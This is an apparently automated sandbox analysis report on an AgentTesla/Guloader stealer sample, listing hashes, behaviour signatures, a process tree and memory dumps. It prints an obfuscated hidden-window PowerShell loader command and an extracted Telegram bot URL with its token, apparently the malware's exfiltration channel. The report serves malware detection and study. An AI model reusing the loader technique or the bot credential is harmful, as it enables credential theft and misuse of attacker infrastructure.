agenttesla | 3b530ace3209771f676e361ebc54dfc5d992d5069db93d416cd4b60745ccc400

Analysis

max time kernel
157s
max time network
159s
platform
windows7_x64
resource
win7-20240221-en
resource tags

arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
submitted
07/03/2024, 13:15

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

226350194-050944-sanlccjavap0003-11764.rar
Size

488KB
MD5

3d0f594ee92bed02cbb787b2c50f6896
SHA1

8e61a5560a22ca39369d781af051249f703562cb
SHA256

dd417f9b28a642ad5b273b300099d785e84d8bc89514cb4c7703558de5f0d615
SHA512

32c26ab4bf9640b4529cfec87de19b83ff1d309280844b12303ae01d79483194dbac77ab8e68fbd9adfcf489dd64e5682b5a87fc39ae625d1f93aa60e911ef67
SSDEEP

12288:wmDS02BY1vuQ7pf9SWj1LdvFZwmjNWxsiu5eNMJ2GRWqevQp:wm8BYcQ7pf9Z1LDsgFJ2GR8Qp

Score

10^/10

agenttesla guloader downloader keylogger spyware stealer trojan

Malware Config

Extracted

Family

agenttesla

https://api.telegram.org/bot5147163644:AAEDa60jT_0f_OgilwiEp-CBiARVO2Rx3Mo/

Signatures

AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
keylogger trojan stealer spyware agenttesla
Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
downloader guloader

Executes dropped EXE 1 IoCs

pid	Process
2372	226350194-050944-sanlccjavap0003-11764.exe

Loads dropped DLL 2 IoCs

pid	Process
1996	powershell.exe
1996	powershell.exe

Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs

pid	Process
1760	wab.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

pid	Process
1996	powershell.exe
1760	wab.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 1996 set thread context of 1760	1996	powershell.exe	36

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

NSIS installer 2 IoCs

installer

resource	yara_rule
behavioral3/files/0x002600000001447e-34.dat	nsis_installer_1
behavioral3/files/0x002600000001447e-34.dat	nsis_installer_2

Suspicious behavior: EnumeratesProcesses 12 IoCs

pid	Process
1996	powershell.exe
1996	powershell.exe
1996	powershell.exe
1996	powershell.exe
1996	powershell.exe
1996	powershell.exe
1996	powershell.exe
2692	7zFM.exe
1996	powershell.exe
2692	7zFM.exe
1760	wab.exe
1760	wab.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
2692	7zFM.exe

Suspicious behavior: MapViewOfSection 1 IoCs

pid	Process
1996	powershell.exe

Suspicious use of AdjustPrivilegeToken 5 IoCs

description	pid	Process
Token: SeRestorePrivilege	2692	7zFM.exe
Token: 35	2692	7zFM.exe
Token: SeSecurityPrivilege	2692	7zFM.exe
Token: SeDebugPrivilege	1996	powershell.exe
Token: SeDebugPrivilege	1760	wab.exe

Suspicious use of FindShellTrayWindow 3 IoCs

pid	Process
2692	7zFM.exe
2692	7zFM.exe
2692	7zFM.exe

Suspicious use of WriteProcessMemory 21 IoCs

description	pid	Process	procid_target
PID 3048 wrote to memory of 2692	3048	cmd.exe	28
PID 3048 wrote to memory of 2692	3048	cmd.exe	28
PID 3048 wrote to memory of 2692	3048	cmd.exe	28
PID 2692 wrote to memory of 2372	2692	7zFM.exe	31
PID 2692 wrote to memory of 2372	2692	7zFM.exe	31
PID 2692 wrote to memory of 2372	2692	7zFM.exe	31
PID 2692 wrote to memory of 2372	2692	7zFM.exe	31
PID 2372 wrote to memory of 1996	2372	226350194-050944-sanlccjavap0003-11764.exe	32
PID 2372 wrote to memory of 1996	2372	226350194-050944-sanlccjavap0003-11764.exe	32
PID 2372 wrote to memory of 1996	2372	226350194-050944-sanlccjavap0003-11764.exe	32
PID 2372 wrote to memory of 1996	2372	226350194-050944-sanlccjavap0003-11764.exe	32
PID 1996 wrote to memory of 1468	1996	powershell.exe	34
PID 1996 wrote to memory of 1468	1996	powershell.exe	34
PID 1996 wrote to memory of 1468	1996	powershell.exe	34
PID 1996 wrote to memory of 1468	1996	powershell.exe	34
PID 1996 wrote to memory of 1760	1996	powershell.exe	36
PID 1996 wrote to memory of 1760	1996	powershell.exe	36
PID 1996 wrote to memory of 1760	1996	powershell.exe	36
PID 1996 wrote to memory of 1760	1996	powershell.exe	36
PID 1996 wrote to memory of 1760	1996	powershell.exe	36
PID 1996 wrote to memory of 1760	1996	powershell.exe	36

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\226350194-050944-sanlccjavap0003-11764.rar
1⤵
- Suspicious use of WriteProcessMemory
PID:3048
- C:\Program Files\7-Zip\7zFM.exe
  "C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\226350194-050944-sanlccjavap0003-11764.rar"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of WriteProcessMemory
  PID:2692
- - C:\Users\Admin\AppData\Local\Temp\7zO48AC4A77\226350194-050944-sanlccjavap0003-11764.exe
    "C:\Users\Admin\AppData\Local\Temp\7zO48AC4A77\226350194-050944-sanlccjavap0003-11764.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:2372
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" -windowstyle hidden "$angstfyldtes=Get-Content 'C:\Users\Admin\AppData\Local\aftgtstilsagnenes\Ejerkredsen\Lulledes\Preconizing.Nig';$Bombeeksperterne=$angstfyldtes.SubString(58929,3);.$Bombeeksperterne($angstfyldtes)"
      4⤵
      Loads dropped DLL
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Suspicious use of SetThreadContext
      Suspicious behavior: EnumeratesProcesses
      Suspicious behavior: MapViewOfSection
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:1996
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "set /A 1^^0"
        5⤵
        
        PID:1468
    - - C:\Program Files (x86)\windows mail\wab.exe
        
        "C:\Program Files (x86)\windows mail\wab.exe"
        5⤵
        Suspicious use of NtCreateThreadExHideFromDebugger
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1760

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

Filesize
67KB

MD5
753df6889fd7410a2e9fe333da83a429

SHA1
3c425f16e8267186061dd48ac1c77c122962456e

SHA256
b42dc237e44cbc9a43400e7d3f9cbd406dbdefd62bfe87328f8663897d69df78

SHA512
9d56f79410ad0cf852c74c3ef9454e7ae86e80bdd6ff67773994b48ccac71142bcf5c90635da6a056e1406e81e64674db9584928e867c55b77b59e2851cf6444

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zO48AC4A77\226350194-050944-sanlccjavap0003-11764.exe

Filesize
626KB

MD5
0d4bb5c57ce0f99b36056892cfe87f0c

SHA1
bd884e9d666bce68ef23dfa139f6477f1c50f7ab

SHA256
0301d446fd70d25f294abb066b139bdc8d5362f86d9d10ae4c5ed13e7e6f311c

SHA512
7d404dc721e4eb51f91956b96d3864ae2d2cc9e8c8464d446abf087b84466230ddea2662107b5d192369e8b2211b3616025628dc07f4eb679676144915dcaf6e

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar5F76.tmp

Filesize
175KB

MD5
dd73cead4b93366cf3465c8cd32e2796

SHA1
74546226dfe9ceb8184651e920d1dbfb432b314e

SHA256
a6752b7851b591550e4625b832a393aabcc428de18d83e8593cd540f7d7cae22

SHA512
ce1bdd595065c94fa528badf4a6a8777893807d6789267612755df818ba6ffe55e4df429710aea29526ee4aa8ef20e25f2f05341da53992157d21ae032c0fb63

Download Submit
C:\Users\Admin\AppData\Local\aftgtstilsagnenes\Civilhortonoms\Dyretmmersken\Mealybug\Laesning.Sko

Filesize
348KB

MD5
edac2c2f62e371a80143df8caaec5b24

SHA1
0b7e4c090f25b6a0ffdab3e1d4e94ea3a706584b

SHA256
ae0652e2eedf1db5506d11bdf75d677c37fb7896c64435f6afdf9161235a9616

SHA512
aa37fc1656f385b4a18c2cd8edd4c6befec3b9df14fb656bbc831274c4e1708e292e0e60e26470f3159d2ab1819b39594cc854428b65028bc468c43d3d12e3be

Download Submit
C:\Users\Admin\AppData\Local\aftgtstilsagnenes\Ejerkredsen\Lulledes\Preconizing.Nig

Filesize
57KB

MD5
f5a06265c76853290d3b7ed1c1d3e7b9

SHA1
4083441407a629edd297d1a480a4957740b99fd1

SHA256
f15289a9086ec32c0f072940209c5c50412dde5275dac49a8d271cb53e843eab

SHA512
52ef36d8443eec762f2980b0ada477a9b74f0af2d0cedfb73015fbac04c28e85a85af4be6a4f67c6d7ee3b59b07abf6be2042465154ac3525e035947db15d6e8

Download Submit
memory/1760-70-0x00000000006A0000-0x0000000001702000-memory.dmp

Filesize
16.4MB

Download
memory/1760-134-0x0000000022530000-0x0000000022570000-memory.dmp

Filesize
256KB

Download
memory/1760-132-0x000000006E7C0000-0x000000006EEAE000-memory.dmp

Filesize
6.9MB

Download
memory/1760-131-0x00000000006A0000-0x00000000006E0000-memory.dmp

Filesize
256KB

Download
memory/1760-127-0x0000000077020000-0x00000000770F6000-memory.dmp

Filesize
856KB

Download
memory/1760-126-0x00000000006A0000-0x0000000001702000-memory.dmp

Filesize
16.4MB

Download
memory/1760-67-0x0000000076E30000-0x0000000076FD9000-memory.dmp

Filesize
1.7MB

Download
memory/1760-71-0x0000000001710000-0x0000000003E6C000-memory.dmp

Filesize
39.4MB

Download
memory/1760-69-0x0000000077020000-0x00000000770F6000-memory.dmp

Filesize
856KB

Download
memory/1760-68-0x0000000077056000-0x0000000077057000-memory.dmp

Filesize
4KB

Download
memory/1760-65-0x0000000001710000-0x0000000003E6C000-memory.dmp

Filesize
39.4MB

Download
memory/1996-58-0x0000000001C60000-0x0000000001CA0000-memory.dmp

Filesize
256KB

Download
memory/1996-59-0x00000000062E0000-0x0000000008A3C000-memory.dmp

Filesize
39.4MB

Download
memory/1996-64-0x0000000077020000-0x00000000770F6000-memory.dmp

Filesize
856KB

Download
memory/1996-63-0x0000000076E30000-0x0000000076FD9000-memory.dmp

Filesize
1.7MB

Download
memory/1996-62-0x00000000062E0000-0x0000000008A3C000-memory.dmp

Filesize
39.4MB

Download
memory/1996-60-0x0000000005EC0000-0x0000000005FC0000-memory.dmp

Filesize
1024KB

Download
memory/1996-66-0x00000000062E0000-0x0000000008A3C000-memory.dmp

Filesize
39.4MB

Download
memory/1996-47-0x0000000001C60000-0x0000000001CA0000-memory.dmp

Filesize
256KB

Download
memory/1996-45-0x0000000072E70000-0x000000007341B000-memory.dmp

Filesize
5.7MB

Download
memory/1996-44-0x0000000072E70000-0x000000007341B000-memory.dmp

Filesize
5.7MB

Download
memory/1996-57-0x0000000072E70000-0x000000007341B000-memory.dmp

Filesize
5.7MB

Download
memory/1996-55-0x0000000005170000-0x0000000005174000-memory.dmp

Filesize
16KB

Download
memory/1996-128-0x00000000062E0000-0x0000000008A3C000-memory.dmp

Filesize
39.4MB

Download
memory/1996-46-0x0000000001C60000-0x0000000001CA0000-memory.dmp

Filesize
256KB

Download
memory/1996-53-0x0000000005EC0000-0x0000000005FC0000-memory.dmp

Filesize
1024KB

Download
memory/1996-52-0x0000000001C60000-0x0000000001CA0000-memory.dmp

Filesize
256KB

Download